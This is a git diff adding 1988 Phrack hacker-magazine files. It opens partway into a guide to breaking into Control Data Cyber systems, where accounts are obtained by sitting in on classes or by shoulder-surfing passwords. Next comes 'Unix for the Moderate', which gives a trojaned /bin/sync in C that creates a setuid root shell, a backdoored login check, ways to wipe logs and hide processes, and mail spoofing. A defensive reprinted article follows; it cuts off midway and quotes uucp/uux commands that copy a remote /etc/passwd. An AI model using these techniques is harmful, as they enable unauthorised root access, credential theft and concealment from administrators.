+scanned a bunch of carriers you will need to know how Cyber identifies itself.
+It goes like this:
+
+WELCOME TO THE NOS SOFTWARE SYSTEM.
+COPYRIGHT CONTROL DATA 1978, 1987.
+
+88/02/16. 02.36.53. N265100
+CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
+FAMILY:
+
+You would normally just hit return at the family prompt.  Next prompt is:
+
+USER NAME:
+
+Usernames are in the format  abcdxxx  where a is the location of where the
+account is being used from (A-Z).  the b is a grouping specifying privs and
+limits for the account- usually A-G -where A is the lowest access.  Some
+examples of how they would be used in a college system:
+A = lowest access - class accounts for students
+B = slightly higher than A (for students working on large projects)
+C = Much higher limits, these accounts are usually not too hard to get and
+    they will normally last a long time!  Lab assistants use these.
+D = Instructors, Lecturers, Professors.. etc..
+E = same... (very hard to get these!)
+
+The C and D positions are usually constant according to the groupings.
+For example, a class would have accounts ranging from NADRAAA-AZZ
+                                                          ^^^ ^^^
+                                                 These can also be digits
+
+There are also special operator accounts which start with digits instead of
+numbers. (ie 7ETPDOC)  These accounts can run programs such as the monitor
+which can observe any tty connected to the system...
+
+The next prompt will be for the password, student account passwords cannot be
+changed and are 7 random letters by default, other account passwords can be
+changed.  You get 3 tries until you are logged out.  It is very difficult if
+not impossible to use a brute force hacker or try to guess someone's account..
+so how do you get on?  Here's one easy way... Go down to your local college
+(make sure they have a Cyber computer!) then just buy a class catalog (they
+only cost around 50 cents) or you could look, borrow, steal someone else's...
+then find a pascal or fortran class that fits your schedule!  You will only
+have to attend the class 3 or 4 times max.  Once you get there you should have
+no trouble, but if the instructor asks you questions about why you are not on
+the roll, just tell him that you are auditing the class (taking it without
+enrolling so it won't affect your GPA).  The instructor will usually pass out
+accounts on the 3rd or 4th day of class.. this method also works well with
+just about any system they have on campus!  Another way to get accounts is to
+go down to the computer lab and start snooping!  Look over someone's shoulder
+while they type in their password, or look thru someone's papers while they're
+in the bathroom, or look thru the assistants desk while he is helping
+someone... (I have acquired accounts both ways, and the first way is a lot
+easier with less hassles)  Also, you can use commas instead of returns when
+entering username and password.
+Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
+                     or at the username prompt   nadrajf,dsfgkcd
+
+After you enter your info, the system will respond with:
+
+JSN: APXV, NAMIAF
+/
+
+The 'APXV, NAMIAF' could be different depending on what job you were attached
+to.  The help program looks a lot neater if you have vt100 emulation, if you
+do, type [screen,vt100] (don't type the brackets! from now on, all commands I
+refer to will be enclosed in brackets) Then type help for an extensive
+tutorial or a list of commands. Your best bet at this point is to buy a quick
+reference guide at the campus because I am only going to describe the most
+useful commands. The / means you are in the batch subsystem, there are usually
+6 or 7 other subsystems like basic, fortran, etc... return to batch mode by
+typing [batch].
+
+Some useful commands:
+
+   CATLIST    -  will show permanent files in your directory.
+   ENQUIRE,F  -  displays temporary files in your workspace.
+   LIMITS     -  displays your privileges.
+   INFO       -  get more on-line help.
+   R          -  re-execute last command.
+   GET,fn     -  loads fn into the local file area.
+   CHANGE     -  change certain specs on a file.
+   PERMIT     -  allow other users to use one of your files.
+   REWIND,*   -  rewinds all your local files.
+   NEW,fn     -  creates new file.
+   PURGE      -  deletes files.
+   LIST,F=fn  -  list file.
+   UPROC      -  create an auto-execute procedure file.
+   MAIL       -  send/receive private mail.
+   BYE        -  logoff.
+
+Use the [helpme,cmd] command for the exact syntax and parameters of these
+commands.  There are also several machine specific 'application' programs such
+as pascal, fortran, spitbol, millions of others that you can look up with the
+INFO command... there are also the text editors; edit, xedit, and fse (full
+screen editor).  Xedit is the easiest to use if you are not at a Telray 1061
+terminal and it has full documentation.  Simply type [xedit,fn] to edit the
+file 'fn'.
+
+Special control characters used with Cyber:
+
+Control S and Control Q work normally, the terminate character is Control T
+followed by a carriage return.  If you wanted to break out of an auto-execute
+login program, you would have to hit ^T C/R very fast and repetitively in
+order to break into the batch subsystem.  Control Z is used to set environment
+variables and execute special low level commands, example: [^Z TM C/R] this
+will terminate your connection...
+
+So now you're thinking, what the hell is Cyber good for?  Well, they won't
+have any phone company records, and you can't get credit information from one,
+and I am not going to tell you how to crash it since crashing systems is a
+sin.  There are uses for a Cyber though,  one handy use is to set up a chat
+system, as there are normally 30-40 lines going into a large university Cyber
+system.  I have the source for a chat program called the communicator that I
+will be releasing soon.  Another use is some kind of underground information
+exchange that people frequently set up on other systems, this can easily be
+done with Cyber.
+
+Procedure files:
+
+A procedure file is similar to a batch file for MS-DOS, and a shell script for
+UNIX.  You can make a procedure file auto-execute by using the UPROC command
+like [uproc,auto] will make the file 'auto', auto execute.  There is also a
+special procedure file called the procfile in which any procedure may be
+accessed by simply a - in front of it.  If your procfile read:
+
+.proc,cn.
+.*  sample procedure
+$catlist/un=7etpdoc.
+$exit.
+
+then you could simply type -cn and the / prompt and it would execute the
+catlist command.  Now back to uprocs,  you could easily write a whole BBS in a
+procedure file or say you wanted to run a chat system and you did not want
+people to change the password on your account, you could do this:
+
+.proc,chat,
+PW"Password: "=(*A).
+$ife,PW="cyber",yes.
+   $chat.
+   $revert.
+   $bye.
+$else,yes.
+   $note./Wrong password, try again/.
+   $revert.
+   $bye.
+$endif,yes.
+
+This procedure will ask the user for a password and if he doesn't type "cyber"
+he will be logged off.  If he does get it right then he will be dumped into
+the chat program and as soon as he exits the chat program, he will be logged
+off.  This way, the user cannot get into the batch subsystem and change your
+password or otherwise screw around with the account.  The following is a
+listing of the procfil that I use on my local system, it has a lot of handy
+utilities and examples...
+
+----  cut here  ----
+
+.PROC,B.
+.******BYE******
+$DAYFILE.
+$NOTE.//////////////////////////
+$ASCII.
+$BYE.
+$REVERT,NOLIST.
+#EOR
+.PROC,TIME.
+.******GIVES DAY AND TIME******
+$NOTE./THE CURRENT DAY AND TIME IS/
+$FIND,CLOCK./
+$REVERT,NOLIST.
+#EOR
+.PROC,SIGN*I,IN.
+.******SIGN PRINT UTILITY******.
+$GET,IN.
+$FIND,SIGN,#I=IN,#L=OUT.
+$NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
+$REVERT,NOLIST.
+#EOR
+.PROC,TA.
+.******TALK******
+$SACFIND,AID,COMM.
+$REVERT,NOLIST.
+#EOR
+.PROC,DIR,UN=,FILE=.
+.******DIRECTORY LISTING OF PERMANENT FILES******
+$GET(ZZZZDIR=CAT/#UN=1GTL0CL)
+ZZZZDIR(FILE,#UN=UN)
+$RETURN(ZZZZDIR)
+$REVERT,NOLIST.
+#EOR
+.PROC,Z19.
+.******SET SCREEN TO Z19******
+$SCREEN,Z19.
+$NOTE./SCREEN,Z19.
+$REVERT,NOLIST.
+#EOR
+.PROC,VT.
+.******SET SCREEN TO VT100******
+$SCREEN,VT100.
+$NOTE./SCREEN,VT100.
+$REVERT,NOLIST
+#EOR
+.PROC,SC.
+.******SET SCREEN TO T10******
+$SCREEN,T10.
+$NOTE./SCREEN,T10.
+$REVERT,NOLIST
+#EOR
+.PROC,C.
+.******CATLIST******
+$CATLIST.
+$REVERT,NOLIST.
+#EOR
+.PROC,CA.
+.******CATLIST,LO=F******
+$CATLIST,LO=F.
+$REVERT,NOLIST.
+#EOR
+.PROC,MT.
+.******BBS******
+$SACFIND,AID,MTAB.
+$REVERT,NOLIST.
+#EOR
+.PROC,LI,FILE=.
+.******LIST FILE******
+$GET,FILE.
+$ASCII.
+$COPY(FILE)
+$REVERT.
+$EXIT.
+$CSET(NORMAL)
+$REVERT,NOLIST. WHERE IS THAT FILE??
+#EOR
+.PROC,LOCAL.
+.******DIRECTORY OF LOCAL FILES******
+$RETURN(PROCLIB,YYYYBAD,YYYYPRC)
+$GET(QQQFILE=ENQF/UN=1GTL0CL)
+QQQFILE.
+$REVERT,NOLIST.
+$EXIT.
+$REVERT. FILES ERROR
+#EOR
+.PROC,RL.
+.******RAISE LIMITS******
+$SETASL(*)
+$SETJSL(*)
+$SETTL(*)
+$CSET(ASCII)
+$NOTE./ Limits now at max validated levels.
+$CSET(NORMAL)
+$REVERT,NOLIST.
+#EOR
+.PROC,CL.
+.******CLEAR******
+$CLEAR,*.
+$CSET(ASCII)
+$NOTE./LOCAL FILE AREA CLEARED
+$REVERT,NOLIST.
+#EOR
+.PROC,P,FILE=THING,LST=LIST.
+.***********************************************************
+$CLEAR.
+$GET(FILE)
+$PASCAL4,FILE,LST.
+$REVERT.
+$EXIT.
+$REWIND,*.
+$CSET(ASCII)
+$COPY(LIST)
+$CSET(NORMAL)
+$REVERT,NOLIST.
+#EOR
+.PROC,RE.
+.******REWIND******
+$REWIND,*.
+$CSET(ASCII)
+$NOTE./REWOUND.
+$REVERT,NOLIST.
+#EOR
+.PROC,FOR,FILE,LST=LIST.
+.********************************************************************
+$CLEAR.
+$GET(FILE)
+$FTN5,I=FILE,L=LST.
+$REPLACE(LST=L)
+$CSET(ASCII)
+$REVERT. Fortran Compiled
+$EXIT.
+$REWIND,*.
+$COPY(LST)
+$REVERT. That's all folks.
+#EOR
+.PROC,WAR.
+.******WARBLES******
+$SACFIND,AID,WAR.
+$REVERT,NOLIST.
+#EOR
+.PROC,M.
+.******MAIL/CHECK******
+$MAIL/CHECK.
+$REVERT,NOLIST.
+#EOR
+.PROC,MA.
+.******ENTER MAIL******
+$MAIL.
+$REVERT,NOLIST.
+#EOR
+.PROC,HE,FILE=SUMPROC,UN=.
+.******HELP FILE******
+$GET,FILE/#UN=UN.
+$COPY(FILE)
+$REVERT.
+$EXIT.
+$REVERT,NOLIST.
+#EOR
+.PROC,DYNAMO.
+.******WHO KNOWS??******
+$GET,DYNMEXP/UN=7ETPDOC.
+$SKIPR,DYNMEXP.
+$COPYBR,DYNMEXP,GO.
+$FIND,DYNAMO,GO.
+$REVERT,NOLIST.
+#EOR
+#EOR
+#EOI
+
+----  cut here  ----
+
+I have covered procfil's fairly extensively as I think it is the most useful
+function of Cyber for hackers.  I will be releasing source codes for several
+programs including 'the communicator' chat utility, and a BBS program with a
+full message base.  If you have any questions about Cyber or you have gotten
+into one and don't know what to do, I can be contacted at the Forgotten Realm
+BBS or via UUCP mail at ...!uunet!ncoast!ghost.
+
+Phrozen Ghost
+===============================================================================
diff --git a/phrack18/6.txt b/phrack18/6.txt
new file mode 100644
index 0000000..100069b
--- /dev/null
+++ b/phrack18/6.txt
@@ -0,0 +1,244 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #6 of 11
+
+------------------------------------------------------------------------------
+                            Unix for the Moderate
+-------------------------------------------------------------------------------
+                By:  The Urvile, Necron 99, and a host of me.
+-------------------------------------------------------------------------------
+
+Disclaimer:
+
+   This is mainly for system five.  I do reference BSD occasionally, but I
+   mark those.  All those little weird brands (i.e., DEC's Ultrix, Xenix, and
+   so on) can go to hell.
+
+
+Security:  (Improving yours.)
+
+   -Whenever logging onto a system, you should always do the following:
+       $ who -u
+       $ ps -ef
+       $ ps -u root
+
+   or BSD:
+       $ who; w; ps uaxg
+   This prints out who is on, who is active, what is going on presently,
+   everything in the background, and so on.
+
+   And the ever popular:
+       $ find / -name "*log*" -print
+   This lists out all the files with the name 'log' in it.  If you do find a
+   process that is logging what you do, or an odd log file, change it as soon
+   as you can.
+
+   If you think someone may be looking at you and you don't want to leave
+   (Useful for school computers) then go into something that allows shell
+   breaks, or use redirection to your advantage:
+       $ cat < /etc/passwd
+   That puts 'cat' on the ps, not 'cat /etc/passwd'.
+
+   If you're running a setuid process, and don't want it to show up on a ps
+   (Not a very nice thing to have happen), then:
+       $ super_shell
+       # exec sh
+   Runs the setuid shell (super_shell) and puts something 'over' it. You may
+   also want to run 'sh' again if you are nervous, because if you break out of
+   an exec'ed process, you die.  Neat, huh?
+
+
+Improving your id:
+
+   -First on, you should issue the command 'id' & it will tell you you your
+   uid and euid.  (BSD:  whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your
+   id [whoami] and your euid [ls -l].), terribly useful for checking on setuid
+   programs to see if you have root euid privs. Also, do this:
+       $ find / -perm -4000 -exec /bin/ls -lad {} ";"
+   Yes, this finds and does an extended list of all the files that have the
+   setuid bit on them, like /bin/login, /bin/passwd, and so on.  If any of
+   them look nonstandard, play with them, you never can tell what a ^| will do
+   to them sometimes.  Also, if any are writeable and executable, copy sh over
+   them, and you'll have a setuid root shell. Just be sure to copy whatever
+   was there back, otherwise your stay will probably be shortened a bit.
+
+   -What, you have the bin passwd?
+
+   Well, game over.  You have control of the system.  Everything in the bin
+   directory is owned by bin (with the exception of a few things), so you can
+   modify them at will.  Since cron executes a few programs as root every once
+   in a while, such as /bin/sync, try this:
+
+       main()
+          {
+               if (getuid()==0 || getuid()==0)        {
+                    system("cp /bin/sh /tmp/sroot");
+                    system("chmod 4777 /tmp/sroot");  }
+               sync();
+          }
+
+       $ cc file.c
+       $ cp /bin/sync /tmp/sync.old
+       $ mv a.out /bin/sync
+       $ rm file.c
+
+   Now, as soon as cron runs /bin/sync, you'll have a setuid shell in
+   /tmp/sroot.  Feel free to hide it.
+
+   -the 'at' & 'cron' commands:
+
+   Look at the 'at' dir.  Usually /usr/spool/cron/atjobs.  If you can run 'at'
+   (check by typing 'at'), and 'lasttimedone' is writable, then: submit a
+   blank 'at' job, edit 'lastimedone' to do what you want it to do, and move
+   lasttimedone over your entry (like 88.00.00.00).  Then the commands you put
+   in lasttimedone will be ran as that file's owner.  Cron:  in
+   /usr/spool/cron/cronjobs, there are a list of people running cron jobs.
+   Cat root's, and see if he runs any of the programs owned by you (Without
+   doing a su xxx -c "xxx").  For matter, check all the crons.  If you can
+   take one system login, you should be able to get the rest, in time.
+
+   -The disk files.
+
+   These are rather odd.  If you have read permission on the disks in /dev,
+   then you can read any file on the system.  All you have to do is find it in
+   there somewhere.  If the disk is writeable, if you use /etc/fsbd, you can
+   modify any file on the system into whatever you want, such as by changing
+   the permissions on /bin/sh to 4555.  Since this is pretty difficult to
+   understand (and I don't get it fully), then I won't bother with it any
+   more.
+
+   -Trivial su.
+
+   You know with su you can log into anyone else's account if you know their
+   passwords or if you're root.  There are still a number of system 5's that
+   have uid 0, null passwd, rsh accounts on them.  Just be sure to remove your
+   entry in /usr/adm/sulog.
+
+   -Trojan horses?  On Unix?
+
+   Yes, but because of the shell variable PATH, we are generally out of luck,
+   because it usually searches /bin and /usr/bin first.  However, if the first
+   field is a colon, files in the present directory are searched first.  Which
+   means if you put a modified version of 'ls' there, hey.  If this isn't the
+   case, you will have to try something more blatant, like putting it in a
+   game (see Shooting Shark's file a while back).  If you have a system login,
+   you may be able to get something done like that.  See cron.
+
+
+Taking over:
+
+   Once you have root privs, you should read all the mail in /usr/mail, just
+   to sure nothing interesting is up, or anyone is passing another systems
+   passwds about.  You may want to add another entry to the passwd file, but
+   that's relatively dangerous to the life of your machine.  Be sure not to
+   have anything out of the ordinary as the entry (i.e., No uid 0).
+
+   Get a copy of the login program (available at your nearest decent BBS, I
+   hope) of that same version of Unix, and modify it a bit:  on system 5,
+   here's a modification pretty common:  in the routine to check correct
+   passwds, on the line before the actual pw check, put a if
+   (!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling
+   you to log on as any valid user that isn't uid 0 (On system 5).
+
+
+Neato things:
+
+   -Have you ever been on a system that you couldn't get root or read the
+   Systems/L.sys file?  Well, this is a cheap way to overcome it:  'uuname'
+   will list all machines reachable by your Unix, then (Assuming they aren't
+   Direct, and the modem is available):
+       $ cu -d host.you.want            [or]
+       $ uucico -x99 -r1 -shost.you.want
+   Both will do about the same for us.  This will fill your screen with lots
+   of trivial material, but will eventually get to the point of printing the
+   phone number to the other system.  -d enables the cu diagnostics, -x99
+   enables the uucico highest debug, and -R1 says 'uucp master'.
+
+   Back a year or two, almost everywhere had their uucp passwd set to the same
+   thing as their nuucp passwd (Thanks to the Systems file), so it was a
+   breeze getting in.  Even nowadays, some places do it.. You never can tell.
+
+   -Uucp:
+
+   I personally don't like the uucp things.  Uucico and uux are limited by the
+   Permissions file, and in most cases, that means you can't do anything
+   except get & take from the uucppublic dirs.  Then again, if the
+   permission/L.cmd is blank, you should be able to take what files that you
+   want.  I still don't like it.
+
+   -Sending mail:
+
+   Sometimes, the mail program checks only the shell var LOGNAME, so change
+   it, export it, and you may be able to send mail as anyone.  (Mainly early
+   system 5's.)
+       $ LOGNAME="root";export LOGNAME
+
+   -Printing out all the files on the system:
+
+   Useful if you're interested in the filenames.
+       $ find / -print >file_list&
+   And then do a 'grep text file_list' to find any files with 'text' in their
+   names.  Like grep [.]c file_list, grep host file_list....
+
+   -Printing out all restricted files:
+
+   Useful when you have root. As a normal user, do:
+       $ find / -print >/dev/null&
+   This prints out all nonaccessable directories, so become root and see what
+   they are hiding.
+
+   -Printing out all the files in a directory:
+
+   Better looking than ls -R:
+       $ find . -print
+   It starts at the present dir, and goes all the way down.  Catches all
+   '.files', too.
+
+   -Rsh:
+
+   Well in the case of having an account with rsh only, check your 'set'.  If
+   SHELL is not /bin/sh, and you are able to run anything with a shell escape
+   (ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'.
+   If you have write permission on your .profile, change it, because rsh is
+   ran after checking profile.
+
+   -Humor:
+
+   On a system 5, do a:
+       $ cat "food in cans"
+
+   or on a csh, do:
+       % hey unix, got a match?
+
+   Well, I didn't say it was great.
+
+
+Password hacking:
+
+   -Salt:
+
+   In a standard /etc/passwd file, passwords are 13 characters long.  This is
+   an 11 char encrypted passwd and a 2 char encryption modifier (salt), which
+   is used to change the des algorithm in one of 4096<?> ways.  Which means
+   there is no decent way to go and reverse hack it.  Yet.
+
+   On normal system 5 Unix, passwords are supposed to be 6-8 characters long
+   and have both numeric and alphabetic characters in them, which makes a
+   dictionary hacker pretty worthless.  However, if a user keeps insisting his
+   password is going to be 'dog,' usually the system will comply (depending on
+   version).  I have yet to try it, but having the hacker try the normal
+   entry, and then the entry terminated by [0-9] is said to have remarkable
+   results, if you don't mind the 10-fold increase in time.
+
+
+Final notes:
+
+   Yes, I have left a lot out.  That seems to be the rage nowadays..  If you
+   have noticed something wrong, or didn't like this, feel free to tell me.
+   If you can find me.
+
+-------------------------------------------------------------------------------
+                    Hi Ho.  Here ends part one.  <Of one?>
+-------------------------------------------------------------------------------
+                 Produced and directed by: Urvile & Necron 99
+----------------------------------------------------------- (c)  ToK inc., 1988
diff --git a/phrack18/7.txt b/phrack18/7.txt
new file mode 100644
index 0000000..67c5e59
--- /dev/null
+++ b/phrack18/7.txt
@@ -0,0 +1,480 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #7 of 11
+
+                   +--------------------------------------+
+                   |     "Unix System Security Issues"    |
+                   |              Typed by:               |
+                   |               Whisky                 |
+                   |         (from Holland, Europe)       |
+                   +--------------------------------------+
+                   |                 From                 |
+                   |            Information Age           |
+                   |     Vol. 11, Number 2, April 1988    |
+                   |              Written By:             |
+                   | Michael J. Knox and Edward D. Bowden |
+                   +--------------------------------------+
+
+Note:  This file was sent to me from a friend in Holland. I felt
+       that it would be a good idea to present this file to the
+       UNIX-hacker community, to show that hackers don't always
+       harm systems, but sometimes look for ways to secure flaws
+       in existing systems.  -- Jester Sluggo !!
+
+There are a number of elements that have lead to the popularity of the Unix
+operating system in the world today.  The most notable factors are its
+portability among hardware platforms and the interactive programming
+environment that it offers to users.  In fact, these elements have had much to
+do with the successful evolution of the Unix system in the commercial market
+place. (1, 2)
+  As the Unix system expands further into industry and government, the need to
+handle Unix system security will no doubt become imperative.  For example, the
+US government is committing several million dollars a year for the Unix system
+and its supported hardware.  (1) The security requirements for the government
+are tremendous, and one can only guess at the future needs of security in
+industry.
+  In this paper, we will cover some of the more fundamental security risks in
+the Unix system.  Discussed are common causes of Unix system compromise in
+such areas as file protection, password security, networking and hacker
+violations.  In our conclusion, we will comment upon ongoing effects in Unix
+system security, and their direct influence on the portability of the Unix
+operating system.
+
+FILE AND DIRECTORY SECURITY
+
+In the Unix operating system environment, files and directories are organized
+in a tree structure with specific access modes.  The setting of these modes,
+through permission bits (as octal digits), is the basis of Unix system
+security.  Permission bits determine how users can access files and the type
+of access they are allowed.  There are three user access modes for all Unix
+system files and directories:  the owner, the group, and others.  Access to
+read, write and execute within each of the usertypes is also controlled by
+permission bits (Figure 1).  Flexibility in file security is convenient, but
+it has been criticized as an area of system security compromise.
+
+
+                        Permission modes
+OWNER                        GROUP                    OTHERS
+------------------------------------------------------------
+rwx            :             rwx            :         rwx
+------------------------------------------------------------
+r=read  w=write  x=execute
+
+-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
+drwx------ 2 sam A1 2 May 01 12:01 directory
+
+FIGURE 1.  File and directory modes:  File shows Bob as the owner, with read
+and write permission.  Group has write permission, while Others has read and
+execute permission.  The directory gives a secure directory not readable,
+writeable, or executable by Group and Others.
+
+
+  Since the file protection mechanism is so important in the Unix operating
+system, it stands to reason that the proper setting of permission bits is
+required for overall security.  Aside from user ignorance, the most common
+area of file compromise has to do with the default setting of permission bits
+at file creation.  In some systems the default is octal 644, meaning that only
+the file owner can write and read to a file, while all others can only read
+it.  (3) In many "open" environments this may be acceptable.  However, in
+cases where sensitive data is present, the access for reading by others should
+be turned off. The file utility umask does in fact satisfy this requirement.
+A suggested setting, umask 027, would enable all permission for the file
+owner, disable write permission to the group, and disable permissions for all
+others (octal 750).  By inserting this umask command in a user .profile or
+.login file, the default will be overwritten by the new settings at file
+creation.
+  The CHMOD utility can be used to modify permission settings on files and
+directories.  Issuing the following command,
+
+chmod u+rwd,g+rw,g-w,u-rwx file
+
+will provide the file with the same protection as the umask above (octal 750).
+Permission bits can be relaxed with chmod at a later time, but at least
+initially, the file structure can be made secure using a restrictive umask.
+  By responsible application of such utilities as umask and chmod, users can
+enhance file system security.  The Unix system, however, restricts the
+security defined by the user to only owner, group and others.  Thus, the owner
+of the file cannot designate file access to specific users.  As Kowack and
+Healy have pointed out, "The granularity of control that (file security)
+mechanisms is often insufficient in practice (...) it is not possible to grant
+one user write protection to a directory while granting another read
+permission to the same directory.  (4) A useful file security file security
+extension to the Unix system might be Multics style access control lists.
+  With access mode vulnerabilities in mind, users should pay close attention
+to files and directories under their control, and correct permissions whenever
+possible.  Even with the design limitations in mode granularity, following a
+safe approach will ensure a more secure Unix system file structure.
+
+SUID and SGID
+
+The set user id (suid) and set group id (sgid) identify the user and group
+ownership of a file.  By setting the suid or sgid permission bits of an
+executable file, other users can gain access to the same resources (via the
+executable file) as that of the real file's owner.
+
+For Example:
+
+Let Bob's program bob.x be an executable file accessible to others.  When Mary
+executes bob.x, Mary becomes the new program owner.  If during program
+execution bob.x requests access to file browse.txt, then Mary must have
+previous read or write permission to browse.txt.  This would allow Mary and
+everyone else total access to the contents of browse.txt, even when she is not
+running bob.x.  By turning on the suid bit of bob.x, Mary will have the same
+access permissions to browse.txt as does the program's real owner, but she
+will only have access to browse.txt during the execution of bob.x.  Hence, by
+incorporating suid or sgid, unwelcome browsers will be prevented from
+accessing files like browse.txt.
+
+  Although this feature appears to offer substantial access control to Unix
+system files, it does have one critical drawback.  There is always the chance
+that the superuser (system administrator) may have a writable file for others
+that is also set with suid.  With some modification in the file's code (by a
+hacker), an executable file like this would enable a user to become a
+superuser.  Within a short period of time this violator could completely
+compromise system security and make it inaccessible, even to other superusers.
+As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by
+root is better than knowing the root password".
+  To compensate for this security threat, writable suid files should be sought
+out and eliminated by the system administrator.  Reporting of such files by
+normal users is also essential in correcting existing security breaches.
+
+DIRECTORIES
+
+Directory protection is commonly overlooked component of file security in the
+Unix system.  Many system administrators and users are unaware of the fact,
+that "publicly writable directories provide the most opportunities for
+compromising the Unix system security" (6). Administrators tend to make these
+"open" for users to move around and access public files and utilities.  This
+can be disastrous, since files and other subdirectories within writable
+directories can be moved out and replaced with different versions, even if
+contained files are unreadable or unwritable to others.  When this happens, an
+unscrupulous user or a "password breaker" may supplant a Trojan horse of a
+commonly used system utility (e.g. ls, su, mail and so on).  For example,
+imagine
+
+For example:
+
+Imagine that the /bin directory is publicly writable.  The perpetrator could
+first remove the old su version (with rm utility) and then include his own
+fake su to read the password of users who execute this utility.
+
+  Although writable directories can destroy system integrity, readable ones
+can be just as damaging.  Sometimes files and directories are configured to
+permit read access by other.  This subtle convenience can lead to unauthorized
+disclosure of sensitive data:  a serious matter when valuable information is
+lost to a business competitor.
+  As a general rule, therefore, read and write access should be removed from
+all but system administrative directories.  Execute permission will allow
+access to needed files; however, users might explicitly name the file they
+wish to use.  This adds some protection to unreadable and unwritable
+directories.  So, programs like lp file.x in an unreadable directory /ddr will
+print the contents of file.x, while ls/ddr would not list the contents of that
+directory.
+
+PATH VARIABLE
+
+PATH is an environment variable that points to a list of directories, which
+are searched when a file is requested by a process.  The order of that search
+is indicated by the sequence of the listed directories in the PATH name.  This
+variable is established at user logon and is set up in the users .profile of
+.login file.
+  If a user places the current directory as the first entry in PATH, then
+programs in the current directory will be run first.  Programs in other
+directories with the same name will be ignored.  Although file and directory
+access is made easier with a PATH variable set up this way, it may expose the
+user to pre-existing Trojan horses.
+  To illustrate this, assume that a Trojan horse, similar to the cat utility,
+contains an instruction that imparts access privileges to a perpetrator.  The
+fake cat is placed in a public directory /usr/his where a user often works.
+Now if the user has a PATH variable with the current directory first, and he
+enters the cat command while in /usr/his, the fake cat in /usr/his would be
+executed but not the system cat located in /bin.
+  In order to prevent this kind of system violation, the PATH variable must be
+correctly set.  First, if at all possible, exclude the current directory as
+the first entry in the PATH variable and type the full path name when invoking
+Unix system commands.  This enhances file security, but is more cumbersome to
+work with.  Second, if the working directory must be included in the PATH
+variable, then it should always be listed last.  In this way, utilities like
+vi, cat, su and ls will be executed first from systems directories like /bin
+and /usr/bin before searching the user's working directory.
+
+PASSWORD SECURITY
+
+User authentication in the Unix system is accomplished by personal passwords.
+Though passwords offer an additional level of security beyond physical
+constraints, they lend themselves to the greatest area of computer system
+compromise.  Lack of user awareness and responsibility contributes largely to
+this form of computer insecurity.  This is true of many computer facilities
+where password identification, authentication and authorization are required
+for the access of resources - and the Unix operating system is no exception.
+  Password information in many time-sharing systems are kept in restricted
+files that are not ordinarily readable by users.  The Unix system differs in
+this respect, since it allows all users to have read access to the /etc/passwd
+file (FIGURE 2) where encrypted passwords and other user information are
+stored.  Although the Unix system implements a one-way encryption method, and
+in most systems a modified version of the data encryption standard (DES),
+password breaking methods are known. Among these methods, brute-force attacks
+are generally the least effective, yet techniques involving the use of
+heuristics (good guesses and knowledge about passwords) tend to be successful.
+For example, the /etc/passwd file contains such useful information as the
+login name and comments fields.  Login names are especially rewarding to the
+"password breaker" since many users will use login variants for passwords
+(backward spelling, the appending of a single digit etc.).  The comment field
+often contains items such as surname, given name, address, telephone number,
+project name and so on.  To quote Morris and Grampp (7) in their landmark
+paper on Unix system security:
+
+  [in the case of logins]
+
+  The authors made a survey of several dozen local machines, using as trial
+  passwords a collection of the 20 most common female first names, each
+  followed by a single digit.  The total number of passwords tried was,
+  therefore, 200.  At least one of these 200 passwords turned out to be a
+  valid password on every machine surveyed.
+
+  [as for comment fields]
+
+  (...) if an intruder knows something about the people using a machine, a
+  whole new set of candidates is available.  Family and friend's names, auto
+  registration numbers, hobbies, and pets are particularly productive
+  categories to try interactively in the unlikely event that a purely
+  mechanical scan of the password file turns out to be disappointing.
+
+Thus, given a persistent system violator, there is a strong evidence, that he
+will find some information about users in the /etc/passwd file. With this in
+mind, it is obvious that a password file should be unreadable to everyone
+except those in charge of system administration.
+
+
+root:aN2z06ISmxKqQ:0:10:(Boss1),656-35-0989:/:/bin
+mike:9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin
+
+FIGURE 2.  The /etc/passwd file.  Note the comments field as underlined terms.
+
+
+  Resolution of the /etc/passwd file's readability does not entirely solve the
+basic problem with passwords.  Educating users and administrators is necessary
+to assure proper password utilization. First, "good passwords are those that
+are at least six characters long, aren't based on personal information, and
+have some non-alphabetic (especially control) characters in them:  4score,
+my_name, luv2run" (8).  Secondly, passwords should be changed periodically but
+users should avoid alternating between two passwords.  Different passwords for
+different machines and files will aid in protecting sensitive information.
+Finally, passwords should never be available to unauthorized users. Reduction
+of user ignorance about poor password choice will inevitably make a system
+more secure.
+
+NETWORK SECURITY
+
+UUCP system
+The most common Unix system network is the UUCP system, which is a group of
+programs that perform the file transfers and command execution between remote
+systems.  (3) The problem with the UUCP system is that users on the network
+may access other users' files without access permission.  As stated by Nowitz
+(9),
+
+  The uucp system, left unrestricted, will let any outside user execute
+  commands and copy in/out any file that is readable/writable by a uucp login
+  user.  It is up to the individual sites to be aware of this, and apply the
+  protections that they feel free are necessary.
+
+This emphasizes the importance of proper implementation by the system
+administrator.
+  There are four UUCP system commands to consider when looking into network
+security with the Unix system.  The first is uucp, a command used to copy
+files between two Unix systems.  If uucp is not properly implemented by the
+system administrator, any outside user can execute remote commands and copy
+files from another login user.  If the file name on another system is known,
+one could use the uucp command to copy files from that system to their system.
+For example:
+
+  %uucp system2!/main/src/hisfile myfile
+
+will copy hisfile from system2 in the directory /main/src to the file myfile
+in the current local directory.  If file transfer restrictions exist on either
+system, hisfile would not be sent.  If there are no restrictions, any file
+could be copied from a remote user - including the password file.  The
+following would copy the remote system /etc/passwd file to the local file
+thanks:
+
+  %uucp system2!/etc/passwd thanks
+
+System administrators can address the uucp matter by restricting uucp file
+transfers to the directory /user/spool/uucppublic.  (8) If one tries to
+transfer a file anywhere else, a message will be returned saying "remote
+access to path/file denied" and no file transfer will occur.
+  The second UUCP system command to consider is the uux.  Its function is to
+execute commands on remote Unix computers.  This is called remote command
+execution and is most often used to send mail between systems (mail executes
+the uux command internally).
+  The ability to execute a command on another system introduces a serious
+security problem if remote command execution is not limited.  As an example, a
+system should not allow users from another system to perform the following:
+
+  %uux "system1!cat</etc/passwd>/usr/spool/uucppublic"
+
+which would cause system1 to send its /etc/passwd file to the system2 uucp
